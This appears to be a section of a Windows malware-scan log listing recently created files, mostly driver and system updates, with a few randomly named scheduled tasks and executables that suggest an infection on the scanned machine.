2018-01-03 14:45 - 2018-01-03 14:45 - 000001914 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-01-03 14:45 - 2018-01-03 14:45 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-01-03 14:45 - 2018-01-03 14:45 - 000000000 ____D C:\Program Files\Malwarebytes
2018-01-03 14:45 - 2017-11-29 09:11 - 000077432 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2018-01-03 14:38 - 2018-01-03 14:44 - 083316440 _____ (Malwarebytes ) C:\Users\ouroboros\Downloads\mb3-setup-consumer-3.3.1.2183-1.0.262-1.0.3374.exe
2018-01-03 13:42 - 2018-01-05 09:35 - 000000000 ____D C:\AdwCleaner
2018-01-03 13:41 - 2018-01-03 13:42 - 008198432 _____ (Malwarebytes) C:\Users\ouroboros\Downloads\adwcleaner_7.0.6.0.exe
2018-01-03 10:47 - 2018-01-05 09:35 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Unity
2018-01-03 10:47 - 2018-01-03 10:47 - 000000000 ____D C:\Users\ouroboros\AppData\LocalLow\Unity
2018-01-03 10:41 - 2018-01-05 10:01 - 000003550 _____ C:\WINDOWS\System32\Tasks\Jasic
2018-01-03 10:41 - 2018-01-05 00:10 - 000003306 _____ C:\WINDOWS\System32\Tasks\aoIYY
2018-01-03 10:41 - 2018-01-03 10:41 - 000003724 _____ C:\WINDOWS\System32\Tasks\RfumFuaEoEEe
2018-01-03 10:41 - 2017-09-29 21:42 - 000174592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iYWHkUpEd.exe
2018-01-03 10:41 - 2017-09-29 21:42 - 000001153 _____ C:\WINDOWS\SysWOW64\eYyo
2018-01-03 10:41 - 2017-09-29 21:42 - 000000071 _____ C:\WINDOWS\aVPIeFZA
2018-01-03 10:33 - 2018-01-05 09:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2018-01-03 10:33 - 2018-01-05 09:35 - 000000000 ____D C:\Program Files\qBittorrent
2018-01-02 02:33 - 2018-01-02 02:48 - 204142693 _____ C:\Users\ouroboros\Downloads\ASMR EAR CLEANING ❤ Massage, Brushing, Cupping, etc!.mp4
2018-01-01 12:08 - 2018-01-01 13:26 - 716835388 _____ C:\Users\ouroboros\Downloads\fc2423128_hd.mp4
2017-12-28 13:49 - 2017-12-28 13:49 - 000000000 ____D C:\Users\ouroboros\Desktop\Emulators
2017-12-23 15:30 - 2015-09-30 23:20 - 000000000 ____D C:\Users\ouroboros\Desktop\iKON - WELCOME BACK (DEBUT HALF ALBUM) [www.k2nblog.com]
2017-12-21 11:33 - 2017-12-21 11:33 - 000001491 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-12-21 11:31 - 2017-12-21 11:31 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-12-21 11:31 - 2017-12-16 06:47 - 000143960 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-12-21 11:31 - 2017-09-14 07:20 - 000798008 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-12-21 11:31 - 2017-09-14 07:20 - 000490296 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-12-21 11:31 - 2017-09-14 07:19 - 000927544 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-12-21 11:31 - 2017-09-14 07:19 - 000591160 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-12-21 11:30 - 2017-12-16 08:23 - 000532976 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-12-21 11:30 - 2017-12-16 08:23 - 000438584 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 040237456 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 036350960 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 035157488 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 029381936 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 023267096 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 019040512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 013867656 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 013255032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 011781912 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 010883744 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 004202992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 003817584 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 003615032 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001990128 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438871.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001674736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438871.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001331016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001321448 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001135464 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001101104 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001044848 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001038496 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001032688 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000980880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000933360 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000885680 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000794392 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000740144 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000634224 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000616240 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000599536 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000506864 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000045496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-12-21 11:28 - 2017-12-16 08:23 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-12-21 11:22 - 2017-12-21 11:22 - 000000000 ____D C:\NVIDIA
2017-12-21 10:25 - 2017-12-21 10:53 - 461886288 _____ (NVIDIA Corporation) C:\Users\ouroboros\Downloads\388.71-notebook-win10-64bit-international-whql.exe
2017-12-19 08:25 - 2017-12-19 08:25 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2017-12-18 08:04 - 2017-12-18 08:50 - 000000068 _____ C:\Users\ouroboros\AppData\Local\lptx123456
2017-12-13 12:27 - 2017-12-13 12:27 - 000027552 _____ (REALiX™) C:\WINDOWS\system32\Drivers\HWiNFO64A.SYS
2017-12-13 10:13 - 2017-12-04 06:38 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-12-13 10:13 - 2017-12-04 06:38 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-12-13 03:18 - 2017-12-08 14:52 - 000666112 _____ (Microsoft Corporation) C:\WINDOWS\system32\DHolographicDisplay.dll
2017-12-13 03:18 - 2017-12-08 07:34 - 001925296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-12-13 03:18 - 2017-12-08 07:34 - 001634288 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2017-12-13 03:18 - 2017-12-08 07:34 - 000059800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bam.sys
2017-12-13 03:18 - 2017-12-08 07:31 - 008590744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-12-13 03:18 - 2017-12-08 07:31 - 000779440 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-12-13 03:18 - 2017-12-08 07:30 - 000166296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2017-12-13 03:18 - 2017-12-08 07:28 - 000710912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-12-13 03:18 - 2017-12-08 07:28 - 000630752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcrt.dll
2017-12-13 03:18 - 2017-12-08 07:27 - 004504456 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2017-12-13 03:18 - 2017-12-08 07:27 - 003903784 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-12-13 03:18 - 2017-12-08 07:27 - 000184984 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2017-12-13 03:18 - 2017-12-08 07:26 - 007385088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-12-13 03:18 - 2017-12-08 07:26 - 002709200 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-12-13 03:18 - 2017-12-08 07:26 - 000525208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimserv.exe
2017-12-13 03:18 - 2017-12-08 07:25 - 000374032 _____ (Microsoft Corporation) C:\WINDOWS\system32\vac.exe
2017-12-13 03:18 - 2017-12-08 07:24 - 000705944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimgapi.dll
2017-12-13 03:18 - 2017-12-08 07:24 - 000437144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-12-13 03:18 - 2017-12-08 07:24 - 000246168 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-12-13 03:18 - 2017-12-08 07:23 - 005905752 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-12-13 03:18 - 2017-12-08 07:23 - 000677272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-12-13 03:18 - 2017-12-08 07:22 - 001003104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-12-13 03:18 - 2017-12-08 07:22 - 000979352 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-12-13 03:18 - 2017-12-08 07:22 - 000137544 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcrypt.dll
2017-12-13 03:18 - 2017-12-08 07:22 - 000129432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvsocket.sys
2017-12-13 03:18 - 2017-12-08 07:21 - 007676296 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-12-13 03:18 - 2017-12-08 07:20 - 001170000 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-12-13 03:18 - 2017-12-08 07:19 - 021352136 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-12-13 03:18 - 2017-12-08 07:16 - 001776272 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-12-13 03:18 - 2017-12-08 07:16 - 000603920 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-12-13 03:18 - 2017-12-08 07:15 - 001426152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-12-13 03:18 - 2017-12-08 07:15 - 000721592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2017-12-13 03:18 - 2017-12-08 07:14 - 000571288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-12-13 03:18 - 2017-12-08 07:12 - 000401304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volsnap.sys
2017-12-13 03:18 - 2017-12-08 07:10 - 000362904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2017-12-13 03:18 - 2017-12-08 06:58 - 000123512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2017-12-13 03:18 - 2017-12-08 06:57 - 000649304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-12-13 03:18 - 2017-12-08 06:56 - 001528904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2017-12-13 03:18 - 2017-12-08 06:55 - 001490328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-12-13 03:18 - 2017-12-08 06:55 - 000097144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcrypt.dll
2017-12-13 03:18 - 2017-12-08 06:39 - 006092664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-12-13 03:18 - 2017-12-08 06:37 - 001145104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-12-13 03:18 - 2017-12-08 06:36 - 000769096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcrt.dll
2017-12-13 03:18 - 2017-12-08 06:34 - 003484840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-12-13 03:18 - 2017-12-08 06:34 - 002192112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-12-13 03:18 - 2017-12-08 06:33 - 000747416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-12-13 03:18 - 2017-12-08 06:33 - 000592280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wimgapi.dll
2017-12-13 03:18 - 2017-12-08 06:32 - 020286120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-12-13 03:18 - 2017-12-08 06:31 - 001522176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-12-13 03:18 - 2017-12-08 06:31 - 001246432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-12-13 03:18 - 2017-12-08 06:31 - 000982016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-12-13 03:18 - 2017-12-08 06:23 - 006478528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-12-13 03:18 - 2017-12-08 06:22 - 025245696 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-12-13 03:18 - 2017-12-08 06:13 - 002905600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-12-13 03:18 - 2017-12-08 06:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2017-12-13 03:18 - 2017-12-08 06:12 - 000344576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2017-12-13 03:18 - 2017-12-08 06:12 - 000202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-12-13 03:18 - 2017-12-08 06:12 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msscript.ocx
2017-12-13 03:18 - 2017-12-08 06:11 - 003669504 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-12-13 03:18 - 2017-12-08 06:10 - 018916352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 006466048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 001313792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\itss.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-12-13 03:18 - 2017-12-08 06:09 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\batmeter.dll
2017-12-13 03:18 - 2017-12-08 06:09 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2017-12-13 03:18 - 2017-12-08 06:09 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscript.exe
2017-12-13 03:18 - 2017-12-08 06:09 - 000143360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cscript.exe
2017-12-13 03:18 - 2017-12-08 06:09 - 000136704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gamingtcui.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000450048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000206336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scrobj.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000365568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000254976 _____ (Microsoft Corporation) C:\WINDOWS\system32\PushToInstall.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000246272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-12-13 03:18 - 2017-12-08 06:07 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\itss.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2017-12-13 03:18 - 2017-12-08 06:07 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 023652864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000676352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000559104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcui.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscript.exe
2017-12-13 03:18 - 2017-12-08 06:05 - 006037504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 001670656 _____ (Microsoft Corporation) C:\WINDOWS\system32\batmeter.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000664576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000559616 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\HolographicExtensions.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000481792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000363008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmsvc.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000306688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\scrobj.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscript.exe
2017-12-13 03:18 - 2017-12-08 06:05 - 000019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 003678208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 001498112 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 001321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 000568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 002467840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 001559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 001230848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000708096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000708096 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000594944 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000403968 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000308736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\hascsp.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 007545344 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 002864640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 002117632 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 000815616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 000813056 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 000496640 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 008097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 004592640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 001980928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 000021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2017-12-13 03:18 - 2017-12-08 06:00 - 004740608 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-12-13 03:18 - 2017-12-08 06:00 - 002862080 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-12-13 03:18 - 2017-12-08 06:00 - 001509888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 003121664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 002105856 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-12-13 03:18 - 2017-12-08 05:59 - 001666048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 000880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 003478016 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 003211776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 001547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 001353728 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 000812032 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-12-13 03:18 - 2017-12-08 05:57 - 001822208 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-12-13 03:18 - 2017-12-08 05:57 - 001487872 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-12-13 03:18 - 2017-12-08 05:56 - 002666496 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2017-12-13 03:18 - 2017-12-08 05:56 - 001739264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-12-13 03:18 - 2017-12-08 05:56 - 000685056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-12-13 03:18 - 2017-12-08 05:54 - 002510336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
